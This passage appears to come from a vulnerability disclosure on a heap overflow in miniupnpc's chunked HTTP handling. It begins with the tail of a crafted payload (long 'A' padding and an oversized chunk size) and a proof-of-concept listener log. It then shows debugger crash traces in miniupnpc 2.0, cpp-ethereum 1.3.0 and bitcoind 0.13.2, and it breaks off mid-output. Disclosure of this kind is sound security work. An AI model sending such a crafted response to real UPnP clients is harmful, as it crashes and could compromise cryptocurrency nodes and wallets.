AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n3\\r\\nbye\\r\\n0'>\r\n[poc.py - listen() ][ INFO] waiting for connection\r\n```\r\n \r\n \r\n#### A) miniupnpc v2.0\r\n \r\n```python\r\n[[email\u00a0protected] miniupnpc]$ gdb --args ./upnpc-static -u http://192.168.2.104:65000/xxxx.xml -d -s\r\n...\r\n(gdb) r\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\nStarting program: /home/tin/miniupnp/miniupnpc/./upnpc-static -u http://192.168.2.104:65000/xxxx.xml -d -s\r\nupnpc : miniupnpc library test client, version 2.0.\r\n (c) 2005-2016 Thomas Bernard.\r\nGo to http://miniupnp.free.fr/ or http://miniupnp.tuxfamily.org/\r\nfor more information.\r\nparsed url : hostname='192.168.2.104' port=65000 path='/xxxx.xml' scope_id=0\r\naddress miniwget : 192.168.2.113\r\nheader='Transfer-Encoding', value='chunked'\r\nchunked transfer-encoding!\r\nheader='Content-Length', value='9041' //#! user provided content length (valid)\r\nContent-Length: 9041\r\nheader='Content-Type', value='text/html'\r\nchunksize = 15 (f)\r\nchunksize = 2147483648 (80000000) //#! user provided chunk size 0x80000000\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00007ffff7b631a6 in __memcpy_ssse3_back () from /lib64/libc.so.6\r\n(gdb) up\r\n#1 0x000000000040897f in getHTTPResponse ([email\u00a0protected]=7, [email\u00a0protected]=0x7fffffffd59c, [email\u00a0protected]=0x0) at miniwget.c:306\r\n306 memcpy(content_buf + content_buf_used, buf + i, bytestocopy);\r\n(gdb) bt\r\n#0 0x00007ffff7b631a6 in __memcpy_ssse3_back () from /lib64/libc.so.6\r\n#1 0x000000000040897f in getHTTPResponse ([email\u00a0protected]=7, [email\u00a0protected]=0x7fffffffd59c, [email\u00a0protected]=0x0) at miniwget.c:306\r\n#2 0x0000000000408d5c in miniwget3 ([email\u00a0protected]=0x7fffffffd500 \"192.168.2.104\", port=<optimized out>, path=0x7fffffffe73c \"/xxxx.xml\", [email\u00a0protected]=0x7fffffffd59c,\r\n [email\u00a0protected]=0x7fffffffe320 \"192.168.2.113\", [email\u00a0protected]=64, [email\u00a0protected]=0x40b665 \"1.1\", scope_id=0, [email\u00a0protected]=0x0)\r\n at miniwget.c:468\r\n#3 0x00000000004091f1 in miniwget2 (status_code=0x0, scope_id=<optimized out>, addr_str_len=64, addr_str=0x7fffffffe320 \"192.168.2.113\", size=0x7fffffffd59c, path=<optimized out>, port=<optimized out>,\r\n host=0x7fffffffd500 \"192.168.2.104\") at miniwget.c:484\r\n#4 miniwget_getaddr ([email\u00a0protected]=0x7fffffffe722 \"http://192.168.2.104:65000/xxxx.xml\", [email\u00a0protected]=0x7fffffffd59c, [email\u00a0protected]=0x7fffffffe320 \"192.168.2.113\", [email\u00a0protected]=64,\r\n [email\u00a0protected]=0, [email\u00a0protected]=0x0) at miniwget.c:659\r\n#5 0x00000000004043f1 in UPNP_GetIGDFromUrl ([email\u00a0protected]=0x7fffffffe722 \"http://192.168.2.104:65000/xxxx.xml\", [email\u00a0protected]=0x7fffffffd6a0, [email\u00a0protected]=0x7fffffffd790,\r\n [email\u00a0protected]=0x7fffffffe320 \"192.168.2.113\", [email\u00a0protected]=64) at miniupnpc.c:708\r\n#6 0x0000000000401f69 in main (argc=<optimized out>, argv=0x7fffffffe478) at upnpc.c:690\r\n(gdb) i lo\r\ni = 30\r\nbuf = \"f\\r\\n<xml>BOOM</xml>\\r\\n80000000\\r\\n\", 'A' <repeats 1418 times>...\r\nn = 1354\r\nendofheaders = 94\r\nchunked = 1 //#! chunked-encoding mode\r\ncontent_length = 9041 //#! user provided content-length (valid)\r\nchunksize = 2147483648 //#! user provided chunk-size (invalid, 0x80000000)\r\nbytestocopy = 2147483648 //#! is our chunk-size. used in call to memcpy as the number of bytes to copy.\r\nheader_buf = 0x610010 \"HTTP/1.1 200 OK\\r\\nTransfer-Encoding: chunked\\r\\nContent-Length: 9041\\r\\nContent-Type: text/html\\r\\n\\r\\nf\\r\\n<xml>BOOM</xml>\\r\\n80000000\\r\\n\", 'A' <repeats 76 times>...\r\nheader_buf_len = 2048\r\nheader_buf_used = 1448\r\ncontent_buf = 0x610820 \"<xml>BOOM</xml>\"\r\ncontent_buf_len = 9041 //#! has been reallocated to content-length (otherwise this would be ~2k)\r\ncontent_buf_used = 15\r\nchunksize_buf = \"\\000\\060\\060\\060\\060\\060\\060\\060\\000\\311\\377\\377\\377\\177\\000\\000\\313\\[email\u00a0protected]\\000\\000\\000\\000\\000\\005\\000\\000\\000\\000\\000\\000\"\r\nchunksize_buf_index = 0\r\nreason_phrase = 0x0\r\nreason_phrase_len = 0\r\n```\r\n \r\n \r\n#### B) cpp-ethereum v1.3.0\r\n \r\n```python\r\n[[email\u00a0protected] ~]$ eth --version\r\neth version 1.3.0\r\neth network protocol version: 63\r\nClient database version: 12041\r\nBuild: Linux/g++/Interpreter/RelWithDebInfo\r\n \r\n[[email\u00a0protected] miniupnpc]$ gdb --args eth -v 9\r\n...\r\n(gdb) r\r\nStarting program: /usr/bin/eth -v 9\r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\r\ncpp-ethereum, a C++ Ethereum client\r\n... 05:57:56 PM.351|eth Reading /home/...\r\n\u00e2\u00a7 \u00e2\r\n \u00b9 05:57:56 PM.358|eth Id: ##013a7f1f\u00e2\u00a6\r\n[New Thread 0x7fffe6191700 (LWP 9306)]\r\n... 05:57:56 PM.371|eth Opened blockchain DB. Latest: #5203fef2\u00e2\u00a6 (rebuild not needed)\r\n[New Thread 0x7fffe5990700 (LWP 9307)]\r\n... 05:57:56 PM.374|eth Opened state DB.\r\n[New Thread 0x7fffe4e2a700 (LWP 9308)]\r\n\u00e2\u00a7\u00ab \u00e2 05:57:56 PM.375|eth startedWorking()\r\ncpp-ethereum 1.3.0\r\n By cpp-ethereum contributors, (c) 2013-2016.\r\n See the README for contributors and credits.\r\nTransaction Signer: XE50000000000000000000000000000000 (00000000-0000-0000-0000-000000000000 - 00000000)\r\nMining Beneficiary: XE50000000000000000000000000000000 (00000000-0000-0000-0000-000000000000 - 00000000)\r\nFoundation: XE55PXQKKKXXXXXXXXT1XCYW6R5ELFAT6EM (00000000-0000-0000-0000-000000000000 - de0b2956)\r\n[New Thread 0x7fffd7fff700 (LWP 9309)]\r\n[New Thread 0x7fffd77fe700 (LWP 9310)]\r\n \u00e2\r\n \u00b9 05:58:00 PM.757|p2p UPnP device: http://192.168.2.104:65000/xxxx.xml [st: urn:schemas-upnp-org:device:InternetGatewayDevice:1 ]\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffd7fff700 (LWP 9309)]\r\n0x00007ffff3feb0a9 in __memcpy_ssse3_back () from /lib64/libc.so.6\r\n(gdb)\r\n#0 0x00007ffff3feb0a9 in __memcpy_ssse3_back () from /lib64/libc.so.6\r\n#1 0x00007ffff4a8bfce in getHTTPResponse () from /lib64/libminiupnpc.so.16\r\n#2 0x00007ffff4a8c43f in miniwget3.constprop.0 () from /lib64/libminiupnpc.so.16\r\n#3 0x00007ffff4a8c873 in miniwget () from /lib64/libminiupnpc.so.16\r\n#4 0x00007ffff62cb97f in dev::p2p::UPnP::UPnP() () from /lib64/libp2p.so\r\n#5 0x00007ffff633d2d0 in dev::p2p::Network::traverseNAT(std::set<boost::asio::ip::address, std::less<boost::asio::ip::address>, std::allocator<boost::asio::ip::address> > const&, unsigned short, boost::asio::ip::address&) () from /lib64/libp2p.so\r\n#6 0x00007ffff62eed05 in dev::p2p::Host::determinePublic() () from /lib64/libp2p.so\r\n#7 0x00007ffff62ef3b3 in dev::p2p::Host::startedWorking() () from /lib64/libp2p.so\r\n#8 0x00007ffff610e979 in dev::Worker::startWorking()::{lambda()#1}::operator()() const () from /lib64/libdevcore.so\r\n#9 0x00007ffff4831220 in ?? () from /lib64/libstdc++.so.6\r\n#10 0x00007ffff72cddc5 in start_thread () from /lib64/libpthread.so.0\r\n#11 0x00007ffff3f97ced in clone () from /lib64/libc.so.6\r\n```\r\n \r\n \r\n#### C) bitcoind 0.13.2 (windows)\r\n \r\n```c\r\n#> bitcoin-0.13.2\\bin\\bitcoind.exe -upnp -printtoconsole\r\n \r\nBitcoin version v0.13.2\r\n...\r\nmapBlockIndex.size() = 1\r\nnBestHeight = 0\r\nsetKeyPool.size() = 100\r\nmapWallet.size() = 0\r\nmapAddressBook.size() = 1\r\ninit message: Loading addresses...\r\ntorcontrol thread start\r\nLoaded 0 addresses from peers.dat 1ms\r\ninit message: Loading banlist...\r\ninit message: Starting network threads...\r\nupnp thread start\r\ninit message: Done loading\r\nopencon thread start\r\naddcon thread start\r\ndnsseed thread start\r\nmsghand thread start\r\nnet thread start\r\nLoading addresses from DNS seeds (could take a while)\r\n132 addresses found from DNS seeds\r\ndnsseed thread exit\r\nreceive version message: /Satoshi:0.13.1/: version xxxx, blocks=xxxxx, us=xxxxxx:57964, peer=1\r\nPre-allocating up to position 0x100000 in rev00000.dat\r\n...\r\n<crash:upnp thread crashing with access violation>\r\n \r\n \r\n //#! missing symbols - stacktrace not really useful.\r\n \r\n(5fdc.5d34): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for bitcoind.exe -\r\nbitcoind!secp256k1_ecdsa_recover+0x1ea44f:\r\n00000000`01615f1f f3a4 rep movs byte ptr [rdi],byte ptr [rsi]\r\n0:016> !analyze -v -f\r\n*******************************************************************************\r\n* *\r\n* Exception Analysis *\r\n* *\r\n*******************************************************************************\r\n \r\n \r\nFAULTING_IP:\r\nbitcoind!secp256k1_ecdsa_recover+1ea44f\r\n00000000`01615f1f f3a4 rep movs byte ptr [rdi],byte ptr [rsi]\r\n \r\nEXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)\r\nExceptionAddress: 0000000001615f1f (bitcoind!secp256k1_ecdsa_recover+0x00000000001ea44f)\r\n ExceptionCode: c0000005 (Access violation)\r\n ExceptionFlags: 00000000\r\nNumberParameters: 2\r\n Parameter[0]: 0000000000000000\r\n Parameter[1]: 0000000008db0000\r\nAttempt to read from address 0000000008db0000\r\n \r\nCONTEXT: 0000000000000000 -- (.cxr 0x0;r)\r\nrax=0000000008385900 rbx=00000000083848a0 rcx=0000000094964738\r\nrdx=0000000000000000 rsi=0000000008db0000 rdi=0000000008388472\r\nrip=0000000001615f1f rsp=0000000008dad3e0 rbp=00000000949672aa\r\n r8=0000000008387c80 r9=0000000094967295 r10=0000000000000000\r\nr11=0000000008dacd00 r12=00000000949672b8 r13=00000000949672aa\r\nr14=00000000000005b4 r15=0000000000000556\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nbitcoind!secp256k1_ecdsa_recover+0x1ea44f:\r\n00000000`01615f1f f3a4 rep movs byte ptr [rdi],byte ptr [rsi]\r\n \r\nFAULTING_THREAD: 0000000000005d34\r\nPROCESS_NAME: bitcoind.exe\r\nERROR_CODE: (NTSTATUS) 0xc0000005\r\nEXCEPTION_CODE: (NTSTATUS) 0xc0000005\r\nEXCEPTION_PARAMETER1: 0000000000000000\r\nEXCEPTION_PARAMETER2: 0000000008db0000\r\nREAD_ADDRESS: 0000000008db0000\r\nFOLLOWUP_IP:\r\nbitcoind!secp256k1_ecdsa_recover+1ea44f\r\n00000000`01615f1f f3a4 rep movs byte ptr [rdi],byte ptr [rsi]\r\nAPPLICATION_VERIFIER_FLAGS: 0\r\nAPP: bitcoind.exe\r\nANALYSIS_VERSION: 6.3.9600.16384 (debuggers(dbg).130821-1623) amd64fre\r\nBUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_PROBABLYEXPLOITABLE\r\nPRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_PROBABLYEXPLOITABLE\r\nDEFAULT_BUCKET_ID: STRING_DEREFERENCE_PROBABLYEXPLOITABLE\r\nLAST_CONTROL_TRANSFER: from 00000000016160f0 to 0000000001615f1f\r\nSTACK_TEXT:\r\n00000000`08dad3e0 00000000`016160f0 : 00000000`00000754 00000000`00000754 00000000`00000000 00000000`0823af72 : bitcoind!secp256k1_ecdsa_recover+0x1ea44f\r\n00000000`08dadcd0 00000000`01616467 : 00000000`00000010 00007ffc`6a207185 00000000`00000000 00000000`00000010 : bitcoind!secp256k1_ecdsa_recover+0x1ea620\r\n00000000`08dae580 00000000`01612e97 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : bitcoind!secp256k1_ecdsa_recover+0x1ea997\r\n00000000`08dae650 00000000`0124a8fa : 00000000`08239840 00007ffc`a255cfb6 00000000`15040011 00000000`00000001 : bitcoind!secp256k1_ecdsa_recover+0x1e73c7\r\n00000000`08dae740 00000000`0165252a : 00000000`00000000 00000000`08230000 00000000`00000002 00000000`08daf980 : bitcoind+0x7a8fa\r\n00000000`08daf830 00000000`014567c5 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : bitcoind!secp256k1_ecdsa_recover+0x226a5a\r\n00000000`08daf940 00007ffc`a05cb2ba : 00000000`081abb90 00000000`00000000 00000000`00000000 00000000`00000000 : bitcoind!secp256k1_ecdsa_recover+0x2acf5\r\n00000000`08dafb50 00007ffc`a05cb38c : 00007ffc`a0620670 00000000`08237230 00000000`00000000 00000000`00000000 : msvcrt!beginthreadex+0x12a\r\n00000000`08dafb80 00007ffc`a0d28364 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msvcrt!endthreadex+0xac\r\n00000000`08dafbb0 00007ffc`a25870d1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14\r\n00000000`08dafbe0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21\r\n \r\nSTACK_COMMAND: .cxr 0x0 ; kb\r\nSYMBOL_STACK_INDEX: 0\r\nSYMBOL_NAME: bitcoind!secp256k1_ecdsa_recover+1ea44f\r\nFOLLOWUP_NAME: MachineOwner\r\nMODULE_NAME: bitcoind\r\nIMAGE_NAME: bitcoind.exe\r\nFAILURE_BUCKET_ID: 